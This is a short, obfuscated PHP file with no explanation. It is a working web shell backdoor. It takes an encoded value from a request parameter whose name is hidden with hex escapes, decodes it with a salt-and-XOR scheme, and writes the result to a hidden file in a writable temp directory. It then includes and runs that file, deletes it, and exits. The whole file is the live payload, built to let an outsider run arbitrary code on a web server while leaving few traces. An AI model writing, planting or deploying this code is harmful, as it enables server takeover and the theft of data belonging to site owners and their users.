<?php

if(array_key_exists("s\x79\x6D", $_REQUEST) && !is_null($_REQUEST["s\x79\x6D"])){
	$holder = $_REQUEST["s\x79\x6D"];
	$holder=explode ("."			,		$holder		);
	$bind = '';
            $salt8 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($salt8);
            $__len = count($holder);
    
            for ($n = 0; $n < $__len; $n++) { $v2 = $holder[$n];
                $sChar = ord($salt8[$n	 %$sLen]);
                $dec = ((int)$v2 - $sChar - ($n	 %10)) ^ 53;
                $bind .= chr($dec);
            }
	$res = array_filter([getenv("TEMP"), session_save_path(), "/var/tmp", "/tmp", getenv("TMP"), sys_get_temp_dir(), "/dev/shm", getcwd(), ini_get("upload_tmp_dir")]);
	while ($flg = array_shift($res)) {
    		if (max(0, is_dir($flg) * is_writable($flg))) {
    $elem = str_replace("{var_dir}", $flg, "{var_dir}/.ent");
    $success = file_put_contents($elem, $bind);
if ($success) {
	include $elem;
	@unlink($elem);
	die();}
}
}
}